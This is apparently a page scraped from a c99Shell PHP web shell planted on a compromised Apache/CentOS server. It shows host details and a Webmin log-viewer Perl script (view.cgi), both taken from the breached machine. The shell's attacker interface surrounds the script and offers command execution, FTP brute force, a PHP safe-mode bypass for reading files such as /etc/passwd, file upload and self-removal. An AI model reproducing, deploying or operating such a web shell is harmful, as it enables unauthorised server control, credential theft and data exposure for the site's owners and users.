!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/webminlog/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     view.cgi (5.03 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# view.cgi
# Show details of the action, including changed files

use strict;
use warnings;
require './webminlog-lib.pl';
our (%text, %in);
&ReadParse();

# find the log record to view
my $act = &get_action($in{'id'});
&can_user($act->{'user'}) || &error($text{'view_ecannot'});
&can_mod($act->{'module'}) || &error($text{'view_ecannot'});

# display info about the action
&ui_print_header(undef, $text{'view_title'}, "");

my @files = &list_files($act);
print &ui_form_start("rollback.cgi");
print &ui_hidden("id", $in{'id'});
print &ui_hidden("search", $in{'search'});

print &ui_hidden_table_start(&text('view_header', $act->{'id'}),
                       "width=100%", 4, "main", 1);

# This "" is needed to make the label show properly!
print &ui_table_row($text{'view_action'}."",
            &get_action_description($act, 1), 3);

my %minfo = $act->{'module'} eq 'global' ?
        ( 'desc' => $text{'search_global'} ) :
        &get_module_info($act->{'module'});
print &ui_table_row($text{'view_module'},
            $minfo{'desc'});

if ($act->{'module'} ne 'global') {
    print &ui_table_row($text{'view_script'},
                "<tt>$act->{'module'}/$act->{'script'}</tt>");
    }
else {
    print &ui_table_row($text{'view_script'}, "<tt>$act->{'script'}</tt>");
    }

print &ui_table_row($text{'view_user'},
            $act->{'user'});

print &ui_table_row($text{'view_ip'},
            $act->{'ip'});

if ($act->{'sid'} ne '-') {
    print &ui_table_row($text{'view_sid'},
        "<a href='search.cgi?sid=$act->{'sid'}&uall=1&mall=1&tall=1&fall=1&return=".&urlize($in{'return'})."&returndesc=".&urlize($in{'returndesc'})."'>$act->{'sid'}</a>");
    }

print &ui_table_row($text{'view_time'}, &make_date($act->{'time'}));

if ($act->{'webmin'}) {
    print &ui_table_row($text{'view_host'},
                $act->{'webmin'});
    }
print &ui_hidden_table_end("main");

# Annotations for this log entry
my $text = &get_annotation($act);
print &ui_hidden_table_start($text{'view_anno'}, "width=100%", 1, "anno",
                 $text ? 1 : 0);
print &ui_table_row(undef,
    &ui_textarea("anno", $text, 10, 80, "auto", 0,
             "style='width:100%'")."<br>".
    &ui_submit($text{'save'}, "annosave"));
print &ui_hidden_table_end("anno");

# Page output, if any
my $output = &get_action_output($act);
if ($output && &foreign_check("mailboxes")) {
    &foreign_require("mailboxes");
    $output = &mailboxes::filter_javascript($output);
    $output = &mailboxes::safe_urls($output);
    $output = &mailboxes::disable_html_images($output, 1);
    print &ui_hidden_table_start($text{'view_output'}, "width=100%", 1,
                     "output", 0);
    print &ui_table_row(undef, $output, 2);
    print &ui_hidden_table_end("output");
    }

# Raw log data, hidden by default
print &ui_hidden_table_start($text{'view_raw'}, "width=100%", 1, "raw", 0);
my @tds = ( "width=20% ");
my $rtable = &ui_columns_start(
    [ $text{'view_rawname'}, $text{'view_rawvalue'} ], 100, 0, \@tds);
foreach my $k (keys %$act) {
    next if ($k eq 'param');
    $rtable .= &ui_columns_row([
        "<b>".&html_escape($k)."</b>",
        &html_escape($act->{$k}) ], \@tds);
    }
foreach my $k (keys %{$act->{'param'}}) {
    $rtable .= &ui_columns_row([
        &html_escape($k),
        &html_escape(join("\n", split(/\0/, $act->{'param'}->{$k}))) ],
        \@tds);
    }
$rtable .= &ui_columns_end();
print &ui_table_row(undef, $rtable, 2);
print &ui_hidden_table_end("raw");

# display modified and commands run files
my $rbcount = 0;
my $i = 0;
my $fhtml = "";
my $anydiffs = 0;
foreach my $d (&list_diffs($act)) {
    my $t = $text{"view_type_".$d->{'type'}};
    my $rb;
    if ($d->{'type'} eq 'create' || $d->{'type'} eq 'modify' ||
        $d->{'type'} eq 'delete') {
        ($rb) = grep { $_->{'file'} eq $d->{'object'} } @files;
        }
    my $cbox = @files ?
        &ui_checkbox("r", $d->{'object'}, "", $rb, undef, !$rb) : undef;
    $rbcount++ if ($rb);
    if ($t =~ /\$2/ || !$d->{'diff'}) {
        # Diff is just a single line message
        $fhtml .= &ui_hidden_table_start($cbox.
              &text("view_type_".$d->{'type'},
                "<tt>$d->{'object'}</tt>",
                "<tt>".&html_escape($d->{'diff'})."</tt>"),
              "width=100%", 2, "diff$i", 1);
        }
    else {
        # Show multi-line diff
        $fhtml .= &ui_hidden_table_start(
            $cbox.&text("view_type_".$d->{'type'},
                        "<tt>$d->{'object'}</tt>"),
            "width=100%", 2, "diff$i", 1);
        $fhtml .= &ui_table_row(undef,
            "<pre>".&html_escape($d->{'diff'})."</pre>", 2);
        if ($d->{'input'}) {
            # And input too
            $fhtml .= &ui_table_row(undef,
                "<b>".&text('view_input')."</b><br>".
                "<pre>".&html_escape($d->{'input'})."</pre>",2);
            }
        }
    $fhtml .= &ui_hidden_table_end("diff$i");
    $i++;
    $anydiffs++;
    }
if ($rbcount) {
    $fhtml .= &ui_links_row([ &select_all_link("r"),
                      &select_invert_link("r") ]);
    }
print &ui_hidden_table_start($text{'view_files'}, "width=100%", 1, "files", 1);
$fhtml .= "<b>$text{'view_nofiles'}</b><p>\n" if (!$anydiffs);
print &ui_table_row(undef, $fhtml, 2);
print &ui_hidden_table_end("raw");

# Show rollback button
if (@files && $rbcount) {
    print &ui_form_end([ [ "rollback", $text{'view_rollback2'} ] ]);
    }
else {
    print &ui_form_end();
    }

&ui_print_footer("search.cgi?$in{'search'}", $text{'search_return'},
         "", $text{'index_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0097 ]--